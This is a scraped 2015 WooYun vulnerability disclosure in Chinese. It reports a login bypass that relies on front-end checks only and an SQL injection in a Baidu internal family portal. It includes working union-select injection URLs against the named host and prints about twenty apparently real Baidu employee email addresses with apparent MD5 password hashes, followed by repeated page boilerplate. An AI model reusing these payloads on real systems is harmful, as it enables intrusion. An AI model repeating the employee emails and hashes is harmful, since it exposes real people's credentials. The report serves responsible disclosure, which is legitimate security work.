百度某内部系统存在逻辑漏洞及SQL注入(导致9000多员工账号密码泄露)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114928

漏洞标题：百度某内部系统存在逻辑漏洞及SQL注入(导致9000多员工账号密码泄露)

漏洞作者：杀器王子

提交时间：2015-05-19 13:31

修复时间：2015-07-05 16:10

公开时间：2015-07-05 16:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-19：细节已通知厂商并且等待厂商处理中
2015-05-21：厂商已经确认，细节仅向厂商公开
2015-05-31：细节向核心白帽子及相关领域专家公开
2015-06-10：细节向普通白帽子公开
2015-06-20：细节向实习白帽子公开
2015-07-05：细节向公众公开

简要描述：

杀器在手，天下我有！

详细说明：

http://weixin.family.baidu.com/index.php/site/login
这个是百度family，注册的时候限定只能百度邮箱，但是只是前端验证，可以绕过

绕过直接注册一个qq邮箱的账号

收到激活码。激活即可登陆成功，

登陆成功以后，找到一个注入：

http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,version%28%29,4%20--%20;

漏洞证明：

注入，可以跑账号密码,仅测试少量数据。

20 shiyanran@baidu.com
21 madandan@baidu.com
22 linyuguang01@baidu.com
23 lifang@baidu.com
24 renyu04@baidu.com
25 qinsi@baidu.com
26 zhaoyue13@baidu.com
27 wangyingxue@baidu.com
28 tangying01@baidu.com
29 zhanglin@baidu.com
30 menglu@baidu.com
31 jiangjiajuan@baidu.com
32 wencai@baidu.com
33 yangyang@baidu.com
34 zhangxiaonan02@baidu.com
35 limengqi@baidu.com
36 chenchen04@baidu.com
37 xingping@baidu.com
38 wangjifang@baidu.com
39 zhangjiajun@baidu.com
40 zhangmengtao@baidu.com

密码

20 3b3b5bfd7ffc992be972e3e310a1c0b6
21 dacb47cfa9abefe352172f2163c303e0
22 21af188387b880ccef37ab86ede9509a
23 6734f7be9030d2814fc8177551a65bb2
24 c33367701511b4f6020ec61ded352059
25 a3228a45ae89ddd60e1b603dafe16bbd
26 3f64c2a6f6b86faa6be1703695121f48
27 dcc35cff8e9748aec4c60757e4a7271c
28 68f220abf407186ac26d67fea896d07d
29 be5d9ba998a9412a49a6e9d4fcedf931
30 88dc0ab351bed0287ada36766bb9399e
31 e561aeda7988d1a2b85edc58173fe6e5
32 f15b0f346a71d24a13639b9786ee6aca
33 f1247d66afc594721c819fed2624aabd
34 502d337383c26d21b261388094ba11e1
35 ef5401de6db890b7450872a9368d3715
36 8daadfef9cc52b1f1cee2b30819982dd
37 4ea0581f8568fa6edb21e7dd12b4b45e
38 8404aef1286aad6fefecfdaa72ed6926
39 a566bf8a7f4ece886512229329fe7932
40 d33ceffc51d8abf8a42d439c9f25f058

9000多用户啊
http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,%28SELECT%20count%28*%29%20FROM%20FOTSRbdBZydSEIvukDVz.user%29,4%20--%20;

修复方案：

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-05-21 16:09

厂商回复：

感谢白帽子

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114928

漏洞标题：百度某内部系统存在逻辑漏洞及SQL注入(导致9000多员工账号密码泄露)

相关厂商：百度

漏洞作者：杀器王子

提交时间：2015-05-19 13:31

修复时间：2015-07-05 16:10

公开时间：2015-07-05 16:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114928

漏洞标题：百度某内部系统存在逻辑漏洞及SQL注入(导致9000多员工账号密码泄露)

相关厂商：百度

漏洞作者： 杀器王子

提交时间：2015-05-19 13:31

修复时间：2015-07-05 16:10

公开时间：2015-07-05 16:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0114928"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：杀器王子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源杀器王子@乌云